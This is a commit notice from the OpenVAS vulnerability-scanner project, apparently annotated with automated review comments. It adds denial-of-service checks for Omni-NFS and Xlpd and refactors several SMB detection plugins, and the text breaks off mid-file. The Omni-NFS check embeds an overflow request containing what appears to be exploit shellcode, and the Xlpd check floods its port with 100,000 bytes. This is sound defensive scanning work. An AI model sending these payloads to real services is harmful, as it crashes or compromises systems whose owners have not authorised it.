[Openvas-commits] r5443 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Thu Oct 8 20:03:38 CEST 2009


Author: mime
Date: 2009-10-08 20:03:34 +0200 (Thu, 08 Oct 2009)
New Revision: 5443

Added:
   trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
   trunk/openvas-plugins/scripts/Xlpd_36610.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/cve_current.txt
   trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
   trunk/openvas-plugins/scripts/secpod_smb_func.inc
   trunk/openvas-plugins/scripts/smb_explorer_version.nasl
   trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
   trunk/openvas-plugins/scripts/spybot_detection.nasl
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/ChangeLog	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,5 +1,21 @@
 2009-10-08  Michael Meyer <michael.meyer at intevation.de>
 
+	* scripts/Xlpd_36610.nasl,
+	scripts/Omni_NFS_36608.nasl:
+	Added new plugins.
+
+	* scripts/spybot_detection.nasl,
+	scripts/cisco_vpn_client_detect.nasl,
+	scripts/smb_explorer_version.nasl,
+	scripts/sonicwall_vpn_client_detect.nasl:
+	Modified so that they don't need smb_func.inc
+	anymore.
+
+	* scripts/secpod_smb_func.inc:
+	Added function GetVersionFromFile().
+
+2009-10-08  Michael Meyer <michael.meyer at intevation.de>
+
 	* scripts/showmount.nasl:
 	Added script_copyright().
 

Modified: trunk/openvas-plugins/cve_current.txt
===================================================================
--- trunk/openvas-plugins/cve_current.txt	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/cve_current.txt	2009-10-08 18:03:34 UTC (rev 5443)
@@ -119,3 +119,5 @@
 CVE-2009-3562			SecPod
 CVE-2009-3561			SecPod
 CVE-2009-3525			SecPod
+36610				Greenbone	svn		R
+36608				Greenbone	svn		R

Added: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,123 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100297);
+ script_bugtraq_id(36608);
+ script_version ("1.0-$Revision$");
+
+ script_name("Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities");
+
+desc = "Overview:
+Omni-NFS is prone to multiple stack-based buffer-overflow
+vulnerabilities because the application fails to properly bounds-check
+user-supplied network data before copying it into an insufficiently
+sized memory buffer. The issues affect both server and client.
+
+Exploiting these issues allows attackers to execute arbitrary machine
+code in the context of users running the affected application. Failed
+attempts will likely crash the application, resulting in denial-of-
+service conditions.
+
+Omni-NFS 5.2 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36608
+http://www.xlink.com/nfs_products/NFS_Server/NFS_Server.htm
+
+Risk factor : Low";
+
+ script_description(desc);
+ script_summary("Determine if Omni-NFS is prone to a Stack Buffer Overflow");
+ script_category(ACT_DENIAL);
+ script_family("Buffer overflow");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("ftp_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/ftp");
+if(!port)port = 21;
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+if(!get_port_state(port))exit(0);
+
+banner = get_ftp_banner(port:port);
+
+if("XLINK" >!< banner)exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+crapdata = crap(length:30000);
+
+req = raw_string(0x4e,0x40,0x96,0xb5,0x46,0x89,0xe3,0x4a,0x1c,0xb1,0x98,0x2c,0xb4,0xb3,0x7b,0x39,
+0xf5,0xa9,0x7c,0x15,0xb7,0xba,0x8c,0xe1,0x4b,0x90,0x73,0x27,0x7b,0x70,0x75,0x10,
+0xe0,0x72,0x4b,0x83,0xeb,0x7a,0x79,0x3c,0xb7,0x48,0x71,0x24,0x7d,0x2d,0xbe,0x40,
+0xb0,0x97,0x46,0x0c,0x1c,0x96,0x80,0xd4,0x3b,0xe2,0x41,0x1d,0xba,0x81,0xfd,0x37,
+0x04,0x15,0xbb,0x43,0xb6,0x49,0x8d,0x93,0x77,0x66,0x42,0x76,0x78,0x74,0x7f,0x2c,
+0x0b,0xf5,0x99,0x47,0xb8,0x9b,0x98,0x29,0xe3,0x05,0x4e,0xb5,0xa9,0xb4,0x14,0x4a,
+0xbf,0x86,0xd6,0xb3,0xb9,0x77,0x31,0xf9,0xa8,0xb2,0x7d,0x02,0xd5,0xb1,0x78,0x35,
+0x73,0x67,0x7f,0x2a,0xe0,0x34,0x71,0x4f,0x7c,0x03,0xfc,0x91,0x74,0x19,0xeb,0x32,
+0xf6,0xe2,0x3f,0x9f,0x7b,0x1a,0xc1,0xf8,0x92,0xbb,0xb3,0x7a,0x18,0xe1,0x42,0x87,
+0xf9,0xb4,0x4b,0x79,0x04,0xba,0x75,0x38,0xe3,0x3c,0x98,0x67,0xb6,0xbf,0xa9,0x09,
+0xf8,0x91,0xb8,0x4e,0x43,0xb9,0xb7,0x2d,0x72,0x12,0xfc,0x3f,0x9b,0x8d,0x49,0x76,
+0x05,0x23,0xd4,0x2c,0x93,0x46,0xb2,0x0c,0x15,0x4a,0x90,0x37,0x1b,0xc0,0xd6,0x24,
+0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0,
+0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff,
+0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1,
+0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33,
+0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a);
+		  
+send(socket:soc, data:req);
+close(soc);
+
+sleep(10);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+ security_warning(port:port);
+ exit(0);
+
+} else {
+
+  for(i=0;i<5;i++) {
+     if(!ftp_recv_line(socket:soc1)) {
+       security_warning(port:port);
+       close(soc1);
+       exit(0);
+     }
+ }
+}
+
+exit(0);
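Review bot: The post-send liveness check in the `else` branch reports a crash as soon as any one of the five `ftp_recv_line()` calls returns nothing, but a healthy FTP server normally sends its greeting once and then waits for a command, so the second read would likely come back empty and flag a server that survived. If the loop is meant as a retry, the test is inverted; reading the greeting once is enough: `if(!ftp_recv_line(socket:soc1)) security_warning(port:port);` followed by an unconditional `close(soc1);`, which also closes the socket that is currently left open when all five reads succeed. The description's `Risk factor : Low` also sits oddly next to text that describes arbitrary code execution. The `raw_string(...)` request deserves a comment stating where the bytes come from and why a crash check needs them.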


Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
===================================================================
--- trunk/openvas-plugins/scripts/Xlpd_36610.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Xlpd Remote Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100296);
+ script_bugtraq_id(36610);
+ script_version ("1.0-$Revision$");
+
+ script_name("Xlpd Remote Denial of Service Vulnerability");
+
+desc = "Overview:
+Xlpd is prone to a denial-of-service vulnerability because it fails to
+adequately validate user-supplied input.
+
+An attacker can exploit this issue to crash the affected application,
+denying service to legitimate users. Given the nature of this issue,
+the attacker may also be able to run arbitrary code, but this has not
+been confirmed.
+
+Xlpd 3.0 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/36610
+http://www.netsarang.com/products/xlp_detail.html
+http://www.securityfocus.com/archive/1/507029
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability");
+ script_category(ACT_DENIAL);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes");
+ script_require_ports("Services/lpd", 515);
+ exit(0);
+}
+
+include("misc_func.inc");
+
+if(safe_checks())exit(0);
+
+port = get_kb_item("Services/lpd");
+if(!port)port="515";
+
+if(!get_port_state(port))exit(0);
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+req = crap(data:raw_string(0x41),length:100000);
+send(socket:soc, data:req);
+close(soc);
+
+sleep(2);
+
+soc1 = open_sock_tcp(port);
+if(!soc1) {
+   security_warning(port:port);
+   exit(0);
+}  else {
+   close(soc1);
+}  
+
+exit(0);
+
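Review bot: The crash verdict rests on a single `open_sock_tcp(port)` two seconds after the send, so a transient connect failure or a listener that is slow to accept again is reported as a vulnerable Xlpd. Nothing in the script identifies the service as Xlpd either, so with safe checks off any listener on the LPD port receives the 100000-byte request and any that stops answering is attributed to this product. Retrying the connect a few times with a short sleep before calling `security_warning()` would cut the false positives, and the report text should say that the product was not fingerprinted. The fallback `port="515"` assigns a string where the Omni-NFS check in this commit uses an integer; `if(!port)port=515;` would be consistent.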


Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,31 +1,7 @@
-#
 # Script Written By Ferdy Riphagen 
 # Script distributed under the GNU GPLv2 License. 
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
 
-desc = "
-Synopsis :
-
-There is a VPN client installed on the remote Windows host. 
-
-Description :
-
-The Cisco VPN Client is installed on the remote Windows host.  This
-software can be used for secure connectivity. 
-
-See also :
-
-http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html
-
-Risk factor :
-
-None"; 
-
 if (description) {
  script_id(80037);
  script_version("$Revision: 1.5 $");
@@ -33,107 +9,45 @@
 
  name = "Cisco VPN Client Version Detection";
  script_name(name);
+
+ desc = "Overview: This script is detects the installed version of Cisco VPN
+ Client and sets the result in KB.
+
+ Risk Factor: Informational";
+
  summary = "Detects the version number of the Cisco VPN Client in use";
  script_summary(summary);
  script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
  script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen");
-
  script_require_ports(139, 445);
  script_dependencies("secpod_reg_enum.nasl");
  script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport");
  exit(0);
 }
 
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
 
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-function cleanup(opt) {
-	
-	if (opt == 1) exit(0);
-	else if (opt == 2) {
-		NetUseDel();
-		exit(0);
-	}
+if(!get_kb_item("SMB/WindowsVersion")){
+ exit(0);
 }
 
-# modified 'get_dword' to get the bytes in the right format.
-function get_dword2(blob, pos) {
- 	global_var blob, pos;
-
- 	if (pos > (strlen(blob) - 4)) return NULL;
-	return (ord(blob[pos]) << 16) +
- 			(ord(blob[pos+1]) << 24) +
-			(ord(blob[pos+2])) +
- 			(ord(blob[pos+3]) << 8);
+if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){
+  exit(0);  
 }
 
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); 
-if (ipc != 1) cleanup(opt:2);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) cleanup(opt:2);
-
 key = "SOFTWARE\Cisco Systems\VPN Client";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- 	value = RegQueryValue(handle:regopen, item:"InstallPath");
-	RegCloseKey(handle:regopen);
-	RegCloseKey(handle:hklm);
-	if(!isnull(value)) path = value[1]; 
-	else cleanup(opt:2);
-}
-else cleanup(opt:2);
+path = registry_get_sz(key:key, item:"InstallPath");
 
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) cleanup(opt:1);
-
-fopen = CreateFile(
-	file:exe,
-    desired_access:GENERIC_READ,
-	file_attributes:FILE_ATTRIBUTE_NORMAL,
-	share_mode:FILE_SHARE_READ,
-	create_disposition:OPEN_EXISTING
-);
-
-if (isnull(fopen)) cleanup(opt:2);
-ret = GetFileVersionEx(handle:fopen);
-CloseFile(handle:fopen);
-
-if (!isnull(ret)) children = ret['Children'];
-if (!isnull(children)) info = children['VarFileInfo'];
-if (isnull(info)) cleanup(opt:2);
-
-trans = toupper(hexstr(dec2hex(
-			num:get_dword2(
-			blob:info['Translation'], pos:0))));
-if (isnull(trans)) cleanup(opt:2);
-
-fileinfo = children['StringFileInfo'];
-if (!isnull(fileinfo)) data = fileinfo[trans];
-if (!isnull(data)) ver = data['ProductVersion'];
-
-if (!isnull(ver)) {
-	set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver);
-	report = string(
-		desc, "\n\n",
-		"Plugin output :\n\n",
-		"Version ", ver, " of the Cisco VPN Client is installed.\n"
-		);
-	security_note(port:port, data:report);
+if(path)
+{
+  file = path + "\vpngui.exe";
+  version = GetVersionFromFile(file:file,verstr:"prod");
+  if(!isnull(version)){
+    set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version);
+    exit(0);
+  } 
 }
-cleanup(opt:2);
+
+exit(0);
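Review bot: The new `desc` text is assigned after `script_name(name)` but no `script_description(desc)` call follows it in this hunk, and the one line of the description block that is not shown (between the two hunks) sits before the assignment, so the plugin appears to register no description or an empty one. Add `script_description(desc);` right after the string, and fix the typo in it (`This script is detects`). In the main code, `path + "\vpngui.exe"` inserts a separator that the removed code did not (`\1vpngui.exe`), which suggests InstallPath already ends in a backslash; confirm that the doubled separator still opens the file. The `if (description) {` block opens in the previous hunk.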

Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc
===================================================================
--- trunk/openvas-plugins/scripts/secpod_smb_func.inc	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/secpod_smb_func.inc	2009-10-08 18:03:34 UTC (rev 5443)
@@ -695,3 +695,64 @@
          (ord(data[2]) << 16) + (ord(data[3]) << 24));
   }
 }
+
+function GetVersionFromFile(file, verstr) {
+
+  local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver;
+
+  mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file);
+  file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file);
+
+  soc = open_sock_tcp(port);
+  if(!soc){
+    return NULL;
+  }
+
+  r = smb_session_request(soc:soc, remote:name);
+  if(!r)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  prot = smb_neg_prot(soc:soc);
+  if(!prot)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  r = smb_session_setup(soc:soc, login:login, password:pass,
+                        domain:domain, prot:prot);
+  if(!r)
+  {
+    close(soc);
+    return NULL;
+  }
+
+  uid = session_extract_uid(reply:r);
+  r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare);
+
+  tid = tconx_extract_tid(reply:r);
+  if(!tid)
+  {
+    close(soc);
+    return NULL;
+  }
+  fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file);
+  if(!fid)
+  {
+    close(soc);
+    return NULL;
+  }
+  if(isnull(verstr)) {
+    ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid);
+  } else {
+    ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr);
+  }
+  close(soc);
+
+  return ver;
+ 
+
+}  
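Review bot: `GetVersionFromFile()` reads `port`, `name`, `login`, `pass` and `domain`, none of which is a parameter or listed in `local_var`, so it only works when the caller happens to hold globals with exactly those names. The Cisco and SonicWall hunks in this commit remove those assignments from the callers, which, as far as these hunks show, leaves `open_sock_tcp(port)` without a port unless an included library sets it. `fid` is also missing from `local_var`. The drive-letter patterns are unanchored and upper-case only, where the code they replace used `^([A-Za-z]):`, so a path such as `c:\...` would pass through unchanged as the share name; the spybot_detection.nasl hunk repeats the same patterns. Fetching the connection settings inside the function with the kb_smb_*() helpers that the spybot hunk already calls removes the hidden dependency.

```nasl
function GetVersionFromFile(file, verstr) {

  local_var file, share, verstr, mshare, soc, r, prot, uid, tid, fid, ver;
  local_var name, login, pass, domain, port;

  # Read the SMB connection settings here instead of relying on
  # identically named globals in the calling plugin.
  name   = kb_smb_name();
  login  = kb_smb_login();
  pass   = kb_smb_password();
  domain = kb_smb_domain();
  port   = kb_smb_transport();
  if(!port) port = 139;

  # Anchor the match and accept lower-case drive letters.
  mshare = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:file);
  file = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1", string:file);

  # … unchanged: session request, protocol negotiation, session setup, tree connect, OpenAndX, GetVersion …
```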

Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl
===================================================================
--- trunk/openvas-plugins/scripts/smb_explorer_version.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -97,7 +97,7 @@
 #==================================================================#
 # Main code                                                        #
 #==================================================================#
-include("smb_func.inc");
+
 warning = 0;
 
 access = get_kb_item("SMB/registry_full_access");

Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,34 +1,17 @@
 #
 # Script Written By Ferdy Riphagen 
 # Script distributed under the GNU GPLv2 License. 
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation.de>
 
 if (description) {
  script_id(80044);
  script_version("$Revision: 1.1 $");
 
- desc = "
-Synopsis :
+ desc = "Overview: This script detects the installed version of
+SonicWall Global VPN Client and sets the result in KB.
 
-There is a VPN client installed on the remote host.
+Risk Factor: Informational";
 
-Description :
-
-The SonicWall Global VPN Client is installed on the remote system. This
-software can be used to establish secure remote connections. 
-
-See also :
-
-http://www.sonicwall.com/
-
-Risk factor :
-
-None"; 
  script_description(desc);
 
  name = "SonicWall Global VPN Client Detection";
@@ -37,7 +20,7 @@
  script_summary(summary);
  
  script_category(ACT_GATHER_INFO);
- script_family("Windows");
+ script_family("Service detection");
  script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen");
 
  script_require_ports(139, 445);
@@ -46,83 +29,30 @@
  exit(0);
 }
 
-include("smb_func.inc");
-include("misc_func.inc");
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
 
-login = kb_smb_login();
-pass = kb_smb_password();
-port = kb_smb_transport();
-name = kb_smb_name();
-domain = kb_smb_domain();
-
-if(!get_port_state(port)) exit(0);
-soc = open_sock_tcp(port);
-if(!soc || (!name)) exit(0);
-
-session_init(socket:soc, hostname:name);
-ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); 
-if (ipc != 1) exit(0);
-
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) {
-	NetUseDel();
-	exit(0);
+if(!get_kb_item("SMB/WindowsVersion")){
+   exit(0);
 }
 
-path = NULL;
 key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe";
-regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(regopen)) {
- 	value = RegQueryValue(handle:regopen, item:"Path");
-	RegCloseKey(handle:regopen);
-	RegCloseKey(handle:hklm);
-	if(!isnull(value)) path = value[1]; 
-}
-if (isnull(path)) {
-	RegCloseKey(handle:hklm);
-	NetUseDel();
-	exit(0);
-}
 
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path);
-
-conn = NetUseAdd(login:login, password:pass, domain:domain, share:share);
-if (conn != 1) {
-	NetUseDel();
-	exit(0);
+if(!registry_key_exists(key:key)){
+    exit(0);
 }
 
-fopen = CreateFile(
-	file:exe,
-        desired_access:GENERIC_READ,
-	file_attributes:FILE_ATTRIBUTE_NORMAL,
-	share_mode:FILE_SHARE_READ,
-	create_disposition:OPEN_EXISTING
-);
+path = registry_get_sz(key:key, item:"Path");
 
-if (isnull(fopen)) {
-	NetUseDel();
-	exit(0);
-}
+if(path) {
 
-ret = GetFileVersion(handle:fopen);
-CloseFile(handle:fopen);
-NetUseDel();
+  file = path + "\SWGVpnClient.exe";
+  version = GetVersionFromFile(file:file,verstr:"prod");
+  if(!isnull(version)){
+    set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version);
+    set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
+    exit(0);
+  }  
+}  
 
-if (!isnull(ret)) 
-{
-	ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]);
-
-	set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver);
-	set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path);
-
-	report = string("\n",
-			"Version ", ver, " of the SonicWall Global VPN Client is installed\n",
-                        "under :\n",
-                        "\n",
-                        "  ", path
-	);
-	security_note(port:port, extra:report);
-}
 exit(0);
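Review bot: The value stored under `SMB/SonicWallGlobalVPNClient/Version` changes meaning here. The removed code built it from `GetFileVersion()` as four dotted numbers, while the new call passes `verstr:"prod"`, which presumably selects the product-version string, so any plugin comparing this KB item against file versions may now mismatch. If the default of `GetVersion()` is the file version, `GetVersionFromFile(file:file)` keeps the old semantics; otherwise the change deserves a comment next to the `set_kb_item()` call. The plugin also no longer calls `security_note()`, so the detection is no longer visible in the report; if that is intended, a comment saying the script only populates the KB would help.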

Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl
===================================================================
--- trunk/openvas-plugins/scripts/spybot_detection.nasl	2009-10-08 12:27:43 UTC (rev 5442)
+++ trunk/openvas-plugins/scripts/spybot_detection.nasl	2009-10-08 18:03:34 UTC (rev 5443)
@@ -1,15 +1,9 @@
 #
 # (C) Josh Zlatin-Amishav and Tenable Network Security
 # GPLv2
-#
-# Tenable grants a special exception for this plugin to use the library 
-# 'smb_func.inc'. This exception does not apply to any modified version of 
-# this plugin.
-#
-# kst-depend-smb
+# Modified by Michael Meyer <michael.meyer at intevation,de>
 
- desc = "
-Synopsis :
+ desc = "Synopsis :
 
 The remote Windows host has a spyware detection program installed on it.
 
@@ -20,11 +14,9 @@
 kinds from your computer.
 
 See also :
-
 http://www.safer-networking.org/
 
 Risk factor :
-
 None";
 
 if(description)
@@ -34,195 +26,175 @@
 
  name = "Spybot Search & Destroy Detection";
  script_name(name);
- 
+
  script_description(desc);
- 
+
  summary = "Checks whether Spybot Search & Destroy is installed";
 
  script_summary(summary);
  script_category(ACT_GATHER_INFO);
- 
+
  script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security");
- family = "Windows";
+ family = "Service detection";
  script_family(family);
- 
+
  script_dependencies("secpod_reg_enum.nasl");
- script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); 
+ script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport");
  script_require_ports(139, 445);
  exit(0);
 }
 
+include("smb_nt.inc");
+include("secpod_smb_func.inc");
+include("global_settings.inc");
 
-include("smb_func.inc");
-include("secpod_reg.inc");
+ if(!get_kb_item("SMB/WindowsVersion")){
+   exit(0);
+ }
 
+ name   =  kb_smb_name();
+ login  =  kb_smb_login();
+ pass   =  kb_smb_password();
+ domain =  kb_smb_domain();
+ port   =  kb_smb_transport();
 
-name 	= kb_smb_name();
-login	= kb_smb_login();
-pass  	= kb_smb_password();
-domain	= kb_smb_domain();
-port    = kb_smb_transport();
+ if(!port) port = 139;
+ if(!get_port_state(port))exit(0);
 
-if(!get_port_state(port))exit(0);
-soc = open_sock_tcp(port);
-if(!soc)exit(1);
+ soc = open_sock_tcp(port);
+ if(!soc){
+        exit(0);
+ }
 
-session_init(socket:soc, hostname:name);
-r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$");
-if ( r != 1 ) 
-{
-  NetUseDel();
-  exit(0);
-}
+ r = smb_session_request(soc:soc, remote:name);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ prot = smb_neg_prot(soc:soc);
+ if(!prot)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# First find where the executable is installed on the remote host
-# Connect to remote registry.
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);
-if (isnull(hklm)) 
-{
-  if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0);
-  NetUseDel();
-  exit(0);
-}
+ r = smb_session_setup(soc:soc, login:login, password:pass,
+                       domain:domain, prot:prot);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ uid = session_extract_uid(reply:r);
+ r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$");
+ tid = tconx_extract_tid(reply:r);
+ if(!tid)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# Determine where Spybot S&D is installed
-key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1";
-key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);
-if (!isnull(key_h)) {
-  value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path");
-  if (!isnull(value)) path = value[1];
-  else path = NULL;
-  
-  RegCloseKey(handle:key_h);
-}
-else path = NULL;
-RegCloseKey(handle:hklm);
+ r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg");
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
-if (isnull(path)) {
-  NetUseDel();
-  exit(0);
-}
+ pipe = smbntcreatex_extract_pipe(reply:r);
+ if(!pipe)
+ {
+        close(soc);
+        exit(0);
+ }
 
+ r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe);
+ if(!r)
+ {
+        close(soc);
+        exit(0);
+ }
 
-# Get the file version / latest sigs.
-share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path);
-exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SpybotSD.exe", string:path);
-rules = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\Updates\downloaded.ini", string:path);
-  
